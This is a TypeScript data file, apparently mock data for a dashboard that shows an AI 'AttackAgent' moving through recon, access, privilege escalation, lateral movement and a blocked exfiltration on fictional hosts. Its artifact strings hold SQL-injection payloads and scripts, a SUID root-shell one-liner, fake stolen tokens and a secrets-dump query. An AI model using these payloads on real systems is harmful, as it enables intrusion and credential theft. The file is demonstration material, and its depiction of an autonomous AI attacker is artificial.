export type TerminalLevel = 'cmd' | 'info' | 'success' | 'warning' | 'blocked' | 'error'

export type MissionPhase =
  | 'recon'
  | 'initial_access'
  | 'privilege_escalation'
  | 'lateral_movement'
  | 'impact'

export interface TerminalLine {
  id: string
  time: string
  level: TerminalLevel
  text: string
}

export type ArtifactKind = 'script' | 'payload' | 'loot'

export interface ExploitArtifact {
  id: string
  time: string
  kind: ArtifactKind
  title: string
  target: string
  language?: string
  content: string
  status: 'generated' | 'success' | 'blocked'
}

export interface AttackStep {
  id: string
  phase: MissionPhase
  phaseLabel: string
  atNode: string
  action: string
  tool: string
  target: string
  status: 'running' | 'success' | 'blocked'
  pathDone: string[]
  pathCurrent?: string
  pathBlocked?: string[]
  missionNote: string
  terminal: TerminalLine[]
  artifacts?: ExploitArtifact[]
}

export const MISSION_PHASES: Array<{
  id: MissionPhase
  label: string
  labelZh: string
}> = [
  { id: 'recon', label: 'Recon', labelZh: '侦察' },
  { id: 'initial_access', label: 'Initial Access', labelZh: '初始访问' },
  { id: 'privilege_escalation', label: 'Privilege Escalation', labelZh: '权限提升' },
  { id: 'lateral_movement', label: 'Lateral Movement', labelZh: '横向移动' },
  { id: 'impact', label: 'Impact', labelZh: '影响' },
]

export const ATTACK_EDGE_IDS = {
  agentToEdge01: 'atk-agent-edge01',
  edge01ToApp01: 'atk-edge01-app01',
  app01ToVault: 'atk-app01-vault',
} as const

export const attackSteps: AttackStep[] = [
  {
    id: 's1',
    phase: 'recon',
    phaseLabel: 'Recon',
    atNode: 'edge01',
    action: 'port_scan',
    tool: 'nmap',
    target: '10.0.1.0/24',
    status: 'success',
    pathDone: [ATTACK_EDGE_IDS.agentToEdge01],
    pathCurrent: ATTACK_EDGE_IDS.agentToEdge01,
    missionNote: '扫描目标企业外网与 DMZ 暴露面',
    terminal: [
      { id: 't1', time: '10:12:08', level: 'cmd', text: 'AttackAgent > nmap -sV 10.0.1.0/24' },
      { id: 't2', time: '10:12:09', level: 'info', text: 'TOOL      nmap · scanning DMZ segment' },
      {
        id: 't3',
        time: '10:12:11',
        level: 'success',
        text: 'RESULT    edge01 open 443/tcp (Web Gateway)',
      },
      {
        id: 't4',
        time: '10:12:11',
        level: 'info',
        text: 'FEEDBACK  Target Environment footprint mapped',
      },
    ],
    artifacts: [
      {
        id: 'art1',
        time: '10:12:11',
        kind: 'script',
        title: 'recon_dmz.sh',
        target: '10.0.1.0/24',
        language: 'bash',
        status: 'generated',
        content: `#!/bin/bash
# auto-generated by AttackAgent · Recon
nmap -sV -Pn --top-ports 100 10.0.1.0/24 -oN /tmp/dmz_scan.nmap
grep -E "open|edge01" /tmp/dmz_scan.nmap`,
      },
    ],
  },
  {
    id: 's2',
    phase: 'initial_access',
    phaseLabel: 'Initial Access',
    atNode: 'edge01',
    action: 'http_exploit',
    tool: 'curl',
    target: 'edge01',
    status: 'success',
    pathDone: [ATTACK_EDGE_IDS.agentToEdge01],
    pathCurrent: ATTACK_EDGE_IDS.agentToEdge01,
    missionNote: '突破 Perimeter，在 edge01 获得初始立足点',
    terminal: [
      {
        id: 't5',
        time: '10:12:14',
        level: 'cmd',
        text: 'AttackAgent > curl -X POST http://edge01/login',
      },
      { id: 't6', time: '10:12:15', level: 'info', text: 'TOOL      curl · credential stuffing' },
      {
        id: 't7',
        time: '10:12:17',
        level: 'success',
        text: 'RESULT    session established on edge01',
      },
      {
        id: 't8',
        time: '10:12:17',
        level: 'success',
        text: 'FEEDBACK  Initial Access obtained · DMZ foothold',
      },
    ],
    artifacts: [
      {
        id: 'art2',
        time: '10:12:17',
        kind: 'payload',
        title: 'edge01_login_payload.json',
        target: 'edge01',
        language: 'json',
        status: 'success',
        content: `{
  "username": "admin' OR '1'='1",
  "password": "anything",
  "remember": true,
  "session": "EDGE01-SESS-7f3a91c2"
}`,
      },
      {
        id: 'art3',
        time: '10:12:17',
        kind: 'script',
        title: 'initial_access.py',
        target: 'edge01',
        language: 'python',
        status: 'success',
        content: `import requests

URL = "http://edge01/login"
payload = {
    "username": "admin' OR '1'='1",
    "password": "anything",
}

r = requests.post(URL, json=payload, timeout=8)
print("status", r.status_code)
print("set-cookie", r.headers.get("Set-Cookie"))`,
      },
    ],
  },
  {
    id: 's3',
    phase: 'privilege_escalation',
    phaseLabel: 'Privilege Escalation',
    atNode: 'edge01',
    action: 'priv_esc',
    tool: 'linpeas',
    target: 'edge01',
    status: 'success',
    pathDone: [ATTACK_EDGE_IDS.agentToEdge01],
    pathCurrent: ATTACK_EDGE_IDS.agentToEdge01,
    missionNote: '在 edge01 提升权限，准备内网跳转',
    terminal: [
      { id: 't9', time: '10:12:20', level: 'cmd', text: 'AttackAgent > ./linpeas.sh' },
      {
        id: 't10',
        time: '10:12:21',
        level: 'info',
        text: 'TOOL      linpeas · local privilege check',
      },
      {
        id: 't11',
        time: '10:12:23',
        level: 'success',
        text: 'RESULT    root shell on edge01',
      },
      {
        id: 't12',
        time: '10:12:23',
        level: 'success',
        text: 'FEEDBACK  Privilege Escalation complete',
      },
    ],
    artifacts: [
      {
        id: 'art4',
        time: '10:12:23',
        kind: 'script',
        title: 'edge01_privesc.sh',
        target: 'edge01',
        language: 'bash',
        status: 'success',
        content: `#!/bin/bash
# generated exploit · SUID abuse on edge01
find / -perm -4000 -type f 2>/dev/null | tee /tmp/suid.list
# matched: /usr/bin/find
/usr/bin/find . -exec /bin/sh -p \\; -quit
id  # uid=0(root)`,
      },
      {
        id: 'art5',
        time: '10:12:23',
        kind: 'loot',
        title: 'edge01_root_token',
        target: 'edge01',
        status: 'success',
        content: `ROOT_TOKEN=rt_edge01_9c2e
SSH_KEY=/tmp/edge01_root.id_rsa
HOST=edge01
ACCESS=root@edge01`,
      },
    ],
  },
  {
    id: 's4',
    phase: 'lateral_movement',
    phaseLabel: 'Lateral Movement',
    atNode: 'app01',
    action: 'sql_inject',
    tool: 'sqlmap',
    target: 'app01-db',
    status: 'running',
    pathDone: [ATTACK_EDGE_IDS.agentToEdge01, ATTACK_EDGE_IDS.edge01ToApp01],
    pathCurrent: ATTACK_EDGE_IDS.edge01ToApp01,
    missionNote: '从 DMZ 横向进入 Service Zone · app01',
    terminal: [
      {
        id: 't13',
        time: '10:12:26',
        level: 'cmd',
        text: 'AttackAgent > sqlmap -u http://app01/api --dbs',
      },
      {
        id: 't14',
        time: '10:12:27',
        level: 'info',
        text: 'TOOL      sqlmap · lateral into Service Zone',
      },
      {
        id: 't15',
        time: '10:12:29',
        level: 'success',
        text: 'RESULT    SQLi on app01-db succeeded',
      },
      {
        id: 't16',
        time: '10:12:29',
        level: 'success',
        text: 'FEEDBACK  Lateral Movement · now operating on app01',
      },
    ],
    artifacts: [
      {
        id: 'art6',
        time: '10:12:29',
        kind: 'payload',
        title: 'app01_sqli_payload.sql',
        target: 'app01-db',
        language: 'sql',
        status: 'success',
        content: `-- successful SQLi payload against /api/orders?id=
1' UNION SELECT NULL,username,password,role FROM users-- -
-- dump excerpt
admin | $2b$10$... | root
svc_app | $2b$10$... | writer`,
      },
      {
        id: 'art7',
        time: '10:12:29',
        kind: 'script',
        title: 'lateral_app01.py',
        target: 'app01',
        language: 'python',
        status: 'success',
        content: `import requests

BASE = "http://app01/api/orders"
PAYLOAD = "1' UNION SELECT NULL,username,password,role FROM users-- -"

r = requests.get(BASE, params={"id": PAYLOAD}, timeout=10)
print(r.text)`,
      },
    ],
  },
  {
    id: 's5',
    phase: 'impact',
    phaseLabel: 'Impact',
    atNode: 'vault01',
    action: 'exfil_attempt',
    tool: 'psql',
    target: 'vault01',
    status: 'blocked',
    pathDone: [ATTACK_EDGE_IDS.agentToEdge01, ATTACK_EDGE_IDS.edge01ToApp01],
    pathCurrent: ATTACK_EDGE_IDS.app01ToVault,
    pathBlocked: [ATTACK_EDGE_IDS.app01ToVault],
    missionNote: '尝试影响 Protected Zone · vault01 敏感数据',
    terminal: [
      {
        id: 't17',
        time: '10:12:32',
        level: 'cmd',
        text: 'AttackAgent > psql -h vault01 -c "SELECT * FROM secrets"',
      },
      {
        id: 't18',
        time: '10:12:33',
        level: 'info',
        text: 'TOOL      psql · Impact against Protected Zone',
      },
      {
        id: 't19',
        time: '10:12:35',
        level: 'blocked',
        text: 'RESULT    connection refused by fw-data policy',
      },
      {
        id: 't20',
        time: '10:12:35',
        level: 'blocked',
        text: 'FEEDBACK  Impact blocked · vault01 remains protected',
      },
    ],
    artifacts: [
      {
        id: 'art8',
        time: '10:12:35',
        kind: 'script',
        title: 'vault01_exfil_attempt.sql',
        target: 'vault01',
        language: 'sql',
        status: 'blocked',
        content: `-- generated exfil script · BLOCKED by Protected Zone
\\connect vault01
SELECT key, value FROM secrets WHERE classification = 'restricted';
COPY (SELECT * FROM secrets) TO '/tmp/loot.csv' CSV HEADER;`,
      },
    ],
  },
]

export const NODE_MARKER_OFFSET: Record<string, { x: number; y: number }> = {
  edge01: { x: 2 * (188 + 16) + 20 + 118, y: 100 + 8 },
  app01: { x: 3 * (188 + 16) + 20 + 118, y: 100 + 8 },
  vault01: { x: 4 * (188 + 16) + 20 + 118, y: 180 + 8 },
}
